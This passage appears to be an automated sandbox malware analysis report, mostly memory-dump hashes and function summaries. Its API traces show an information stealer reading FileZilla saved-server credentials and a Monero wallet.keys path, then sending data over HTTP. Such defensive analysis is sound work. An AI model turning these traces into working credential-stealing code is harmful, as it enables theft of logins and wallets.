                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Similarity
                              • API ID:
                              • String ID: g~w}
                              • API String ID: 0-2534455116
                              • Opcode ID: a3b2897cafaeedab5f3f7edceb660d85904d10f9c2a18cb8be07f22025c10314
                              • Instruction ID: afb5fcbc7d333078b628ee583cb16d94f6f5b412822e46d811757aa2ae81671d
                              • Opcode Fuzzy Hash: a3b2897cafaeedab5f3f7edceb660d85904d10f9c2a18cb8be07f22025c10314
                              • Instruction Fuzzy Hash: 756118F3A082049FE7046E29EC8577ABBE6EFD4320F2B453DD7C493780E97948418696
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Similarity
                              • API ID:
                              • String ID: A~
                              • API String ID: 0-3456608009
                              • Opcode ID: 33ce6e663f0ca9216e6853c231f022cf1bc9fc8d53a6d5b9a7d3ea076645d56e
                              • Instruction ID: b3c3bb8399f0ba0f0ec334fbc10ce007bffffa1d8f07788d0e3352c833085224
                              • Opcode Fuzzy Hash: 33ce6e663f0ca9216e6853c231f022cf1bc9fc8d53a6d5b9a7d3ea076645d56e
                              • Instruction Fuzzy Hash: A26168F3A082148FE340AD3DDC9977BB7D9EB94320F1B453DDA85D3B80E93959058692
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Similarity
                              • API ID:
                              • String ID: !Y+4
                              • API String ID: 0-224594852
                              • Opcode ID: 4b87fd5e08530856be29b835d1e15c6098f27875e972df31bd92186d658c34e6
                              • Instruction ID: 7c8cecc9ea901fd4adb3520fdd44113232026706ce30325e4d747801a0f35859
                              • Opcode Fuzzy Hash: 4b87fd5e08530856be29b835d1e15c6098f27875e972df31bd92186d658c34e6
                              • Instruction Fuzzy Hash: 9151B3B290CA10DFD300AF29D85063AF7F6FF84752F26892DE9C687604E63548549B93
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Similarity
                              • API ID:
                              • String ID: no}
                              • API String ID: 0-1845417697
                              • Opcode ID: 33df2fcc69484e6f4c29499600d7765c6639ab54adb36813c92778fae83ee6a9
                              • Instruction ID: 2db5aacfe28757ad1a8c4ae9841f2419159c009ddfc9e25c02a30204c4308b7c
                              • Opcode Fuzzy Hash: 33df2fcc69484e6f4c29499600d7765c6639ab54adb36813c92778fae83ee6a9
                              • Instruction Fuzzy Hash: 58414CF3A1830C4BE3087E2DED5473AB3C6DB50710F1A423DAA8657B84FD7A6D05468A
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d529bd9d5f112572e7d921d0f81da5173f9f7710db7bcefe45ae093a56370f9f
                              • Instruction ID: 8e4dbca38c714cab907151dc5b9fe69e7d6bdd137a47d7f75ddf4a33837eac24
                              • Opcode Fuzzy Hash: d529bd9d5f112572e7d921d0f81da5173f9f7710db7bcefe45ae093a56370f9f
                              • Instruction Fuzzy Hash: 53617CF391C2045FE304AE28DC8677ABBD5DF94360F1A493DEAC5D7384E93A98418786
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b842a9df9855a00b77d752310aee435907961f0f0c1cac1827e9231545b9b7c1
                              • Instruction ID: bfa2573f6f674065f8e179fb046cdf9198d6e025525d71b553994830d2550819
                              • Opcode Fuzzy Hash: b842a9df9855a00b77d752310aee435907961f0f0c1cac1827e9231545b9b7c1
                              • Instruction Fuzzy Hash: 966147F3A153046BE3006A29DC4577AB7E9DFD4720F2BC53EEAC487780E9349C068692
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 0939e4b59c3d36a65e972a676a3aea861a8166e43581cedd537ae8c7824f1c30
                              • Instruction ID: 13187158b6af20f28a18dc38a51f438571ff4857282679dfaa322827c0c4281b
                              • Opcode Fuzzy Hash: 0939e4b59c3d36a65e972a676a3aea861a8166e43581cedd537ae8c7824f1c30
                              • Instruction Fuzzy Hash: 895115F3A082149FE3046E2DDC8577AFBDAEBC4721F1A453DEBC483784E93958058696
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 773e24e58ec9dce5c97b71fb9aa2a915f2b0d8fe0bf2b91fe91577e134c78b24
                              • Instruction ID: fe993544c1e0018d061ec7529f71dff59c9a7a80cb2c3c289adb9a9dfd0a69f6
                              • Opcode Fuzzy Hash: 773e24e58ec9dce5c97b71fb9aa2a915f2b0d8fe0bf2b91fe91577e134c78b24
                              • Instruction Fuzzy Hash: 98515AF3E196144BD7046E3DEC8426ABFD6DFD4260F2B863DE9C4C7788D53448458682
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b9d40a1e038b35e01754927be1c6e0aa1ec36cd5b67a866eceeff9979e2009a8
                              • Instruction ID: edcdf0cbdb58216e6f0116b8293dbeaced7e233a12658ef7b96775356c25d155
                              • Opcode Fuzzy Hash: b9d40a1e038b35e01754927be1c6e0aa1ec36cd5b67a866eceeff9979e2009a8
                              • Instruction Fuzzy Hash: B14129F7A082045FE304AE2DDC85776B7D5EFD4711F1A863DEAC483794E935A8058286
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 4a03526c61d6811fd58fc4b103af0a1f27c475244fd196edc7e062cf99455f1c
                              • Instruction ID: c838f67bdc93de1cd8abb660d1b6e23d28f13118cafd236eab483794ea647b0b
                              • Opcode Fuzzy Hash: 4a03526c61d6811fd58fc4b103af0a1f27c475244fd196edc7e062cf99455f1c
                              • Instruction Fuzzy Hash: 664138F3A186009FE3586A29EC4577AF3E6EFD4311F2B863DD6C483344E93859058656
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b2a2bb78760af693dce7afa4343974bcfaeecfa83308378f11733f938d06fa64
                              • Instruction ID: 4be1fa9fa35100de7553c4a800d22fa06623e135be90b8ca3330c66b0e134d9e
                              • Opcode Fuzzy Hash: b2a2bb78760af693dce7afa4343974bcfaeecfa83308378f11733f938d06fa64
                              • Instruction Fuzzy Hash: 9A41F6F3E187044BE3046E69ECC537AB7D6EB90310F1B053DDB8987780E9B959458686
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 64de22932dacc2c47247929f5f08db470742925183813ae7c837b955bdff1e3c
                              • Instruction ID: 602142550c2366197afa839127491dbf96b397fdda669d348907ad61c1b78cf9
                              • Opcode Fuzzy Hash: 64de22932dacc2c47247929f5f08db470742925183813ae7c837b955bdff1e3c
                              • Instruction Fuzzy Hash: 3041C3F7E046280BF31059A8DC85776B686EB90324F2B423CDF88977C5E87AAC1547D6
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ec2af0d6e5ddf513dbe89ae1a8a359c0d866c7980c2dd6bff794f53c0f162401
                              • Instruction ID: e1ab16f4dc9a64bf81fce8c15df1218bd8e1708c0d17e2c56ce296b1e56af16b
                              • Opcode Fuzzy Hash: ec2af0d6e5ddf513dbe89ae1a8a359c0d866c7980c2dd6bff794f53c0f162401
                              • Instruction Fuzzy Hash: 4F213DB250C604AFE349BE1ADC817AAFBE6EF99310F16492DD3C583650EB7154408A87
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                              • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                              • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                              • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                              APIs
                                • Part of subcall function 0065A740: lstrcpy.KERNEL32(00660E17,00000000), ref: 0065A788
                                • Part of subcall function 00658DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00658E0B
                                • Part of subcall function 0065A920: lstrcpy.KERNEL32(00000000,?), ref: 0065A972
                                • Part of subcall function 0065A920: lstrcat.KERNEL32(00000000), ref: 0065A982
                                • Part of subcall function 0065A8A0: lstrcpy.KERNEL32(?,00660E17), ref: 0065A905
                                • Part of subcall function 0065A9B0: lstrlen.KERNEL32(?,013D8948,?,\Monero\wallet.keys,00660E17), ref: 0065A9C5
                                • Part of subcall function 0065A9B0: lstrcpy.KERNEL32(00000000), ref: 0065AA04
                                • Part of subcall function 0065A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0065AA12
                                • Part of subcall function 0065A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0065A7E6
                                • Part of subcall function 006499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006499EC
                                • Part of subcall function 006499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00649A11
                                • Part of subcall function 006499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00649A31
                                • Part of subcall function 006499C0: ReadFile.KERNEL32(000000FF,?,00000000,0064148F,00000000), ref: 00649A5A
                                • Part of subcall function 006499C0: LocalFree.KERNEL32(0064148F), ref: 00649A90
                                • Part of subcall function 006499C0: CloseHandle.KERNEL32(000000FF), ref: 00649A9A
                                • Part of subcall function 00658E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00658E52
                              • GetProcessHeap.KERNEL32(00000000,000F423F,00660DBA,00660DB7,00660DB6,00660DB3), ref: 00650362
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00650369
                              • StrStrA.SHLWAPI(00000000,<Host>), ref: 00650385
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00660DB2), ref: 00650393
                              • StrStrA.SHLWAPI(00000000,<Port>), ref: 006503CF
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00660DB2), ref: 006503DD
                              • StrStrA.SHLWAPI(00000000,<User>), ref: 00650419
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00660DB2), ref: 00650427
                              • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00650463
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00660DB2), ref: 00650475
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00660DB2), ref: 00650502
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00660DB2), ref: 0065051A
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00660DB2), ref: 00650532
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00660DB2), ref: 0065054A
                              • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00650562
                              • lstrcat.KERNEL32(?,profile: null), ref: 00650571
                              • lstrcat.KERNEL32(?,url: ), ref: 00650580
                              • lstrcat.KERNEL32(?,00000000), ref: 00650593
                              • lstrcat.KERNEL32(?,00661678), ref: 006505A2
                              • lstrcat.KERNEL32(?,00000000), ref: 006505B5
                              • lstrcat.KERNEL32(?,0066167C), ref: 006505C4
                              • lstrcat.KERNEL32(?,login: ), ref: 006505D3
                              • lstrcat.KERNEL32(?,00000000), ref: 006505E6
                              • lstrcat.KERNEL32(?,00661688), ref: 006505F5
                              • lstrcat.KERNEL32(?,password: ), ref: 00650604
                              • lstrcat.KERNEL32(?,00000000), ref: 00650617
                              • lstrcat.KERNEL32(?,00661698), ref: 00650626
                              • lstrcat.KERNEL32(?,0066169C), ref: 00650635
                              • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00660DB2), ref: 0065068E
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                              • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                              • API String ID: 1942843190-555421843
                              • Opcode ID: a05ed5d0d9a77377311d47793266b9f0ab3f16438b0334285c9f945c1ef45042
                              • Instruction ID: 7bbfe73f4fb2a854fa59f62998abe101d49d68744839ae245c5419490e4f3939
                              • Opcode Fuzzy Hash: a05ed5d0d9a77377311d47793266b9f0ab3f16438b0334285c9f945c1ef45042
                              • Instruction Fuzzy Hash: 74D15E75900108ABDB44FBF4DD96EEE733ABF14301F444619F902A6191EF34AA0ACB66
                              APIs
                                • Part of subcall function 0065A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0065A7E6
                                • Part of subcall function 006447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00644839
                                • Part of subcall function 006447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00644849
                                • Part of subcall function 0065A740: lstrcpy.KERNEL32(00660E17,00000000), ref: 0065A788
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 006459F8
                              • StrCmpCA.SHLWAPI(?,013DEC50), ref: 00645A13
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00645B93
                              • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,013DED40,00000000,?,013DF058,00000000,?,00661A1C), ref: 00645E71
                              • lstrlen.KERNEL32(00000000), ref: 00645E82
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00645E93
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00645E9A
                              • lstrlen.KERNEL32(00000000), ref: 00645EAF
                              • lstrlen.KERNEL32(00000000), ref: 00645ED8
                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00645EF1
                              • lstrlen.KERNEL32(00000000,?,?), ref: 00645F1B
                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00645F2F
                              • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00645F4C
                              • InternetCloseHandle.WININET(00000000), ref: 00645FB0
                              • InternetCloseHandle.WININET(00000000), ref: 00645FBD
                              • HttpOpenRequestA.WININET(00000000,013DEBE0,?,013DE238,00000000,00000000,00400100,00000000), ref: 00645BF8
                                • Part of subcall function 0065A9B0: lstrlen.KERNEL32(?,013D8948,?,\Monero\wallet.keys,00660E17), ref: 0065A9C5
                                • Part of subcall function 0065A9B0: lstrcpy.KERNEL32(00000000), ref: 0065AA04
                                • Part of subcall function 0065A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0065AA12
                                • Part of subcall function 0065A8A0: lstrcpy.KERNEL32(?,00660E17), ref: 0065A905
                                • Part of subcall function 0065A920: lstrcpy.KERNEL32(00000000,?), ref: 0065A972
                                • Part of subcall function 0065A920: lstrcat.KERNEL32(00000000), ref: 0065A982
                              • InternetCloseHandle.WININET(00000000), ref: 00645FC7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                               • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                              • String ID: "$"$------$------$------
                              • API String ID: 874700897-2180234286
                              • Opcode ID: 5a3b441d309653ea15ced4b3b6be3461eb7f8595c04aa27bd36ab8ce14e0ca61
                              • Instruction ID: 016ca1ce166e87871eeafd9be9ac34a1e5e373ff708045be73dc0d641533faee
